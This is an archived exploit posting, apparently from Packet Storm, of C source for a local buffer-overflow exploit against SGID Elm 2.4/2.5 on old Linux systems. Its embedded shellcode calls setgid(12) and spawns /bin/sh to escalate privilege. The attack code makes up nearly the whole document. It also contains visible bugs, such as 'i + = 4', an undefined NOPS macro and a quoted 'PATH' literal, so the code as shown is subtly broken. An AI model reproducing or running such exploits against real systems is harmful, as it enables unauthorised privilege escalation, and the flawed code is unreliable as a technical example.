Linux Elm 2.4/2.5 local exploit - This will give you a shell(gid=12) if /usr/bin/elm is SGID. Tested on slackware 4.0 and redhat 5.1.
82f10bfc8741bb629281379f2f03ccc9/*
Linux Elm 2.4/2.5 local exploit
by slash / buffer0verfl0w security
This will give you a shell(gid=12) if /usr/bin/elm is SGID. Since
there isn't a single persone who didn't code one of these elm
exploits I decided to code mah own :) This was tested on slackware 4.0
and redhat 5.1. Offset on slackware -500. So...beware, yet another elm
exploit.
Shoutouts go to b0f, TESO, ADM, mdma, zsh, FunkySh and all of the people
who know me. Disslikes go out to you-know-who: p4riah and h0lmez.
Peace out,
-- slash - tcsh@b0f.i-p.com - b0f.freebsd.lublin.pl
*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90 /* no operation skip to next instruction */
#define LEN 264 /* our buffersize */
#define PATH "/usr/bin/elm" /* path to the program */
#define OFFSET -500 /* default offset */
char shellcode[]= /* setgid(12); execve("/bin/sh"); */
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){
__asm__("movl %esp,%eax");
}
int main(int argc,char **argv){
char buffer[LEN];
int i,offset;
long retaddr;
printf("Linux Elm 2.4/2.5 local exploit\n");
printf("coded by slash / buffer0verfl0w security\n");
printf("<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>\n");
if(argc > 1){
offset = atoi(argv[1]);
}
else{
offset = OFFSET;
}
/*setting up the ret address*/
retaddr=(esp()-offset);
printf("Using Offset: %d.", offset);
printf("Using return address: 0x%lx", retaddr);
printf("After this run \"reset\"to reset the terminal*");
for( i = 0; i < LEN; i + = 4){
*(long *)&buffer[i] = retaddr;}
/* thanx for the tip {} */
memset(buffer, NOPS, 260 - strlen(shellcode));
/*copying the shellcode into the buffer*/
memcpy( buffer + i, shellcode, strlen(shellcode));
/*executing the program*/
execlp("PATH", "elm", "-f", buffer,0);
return 0;
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!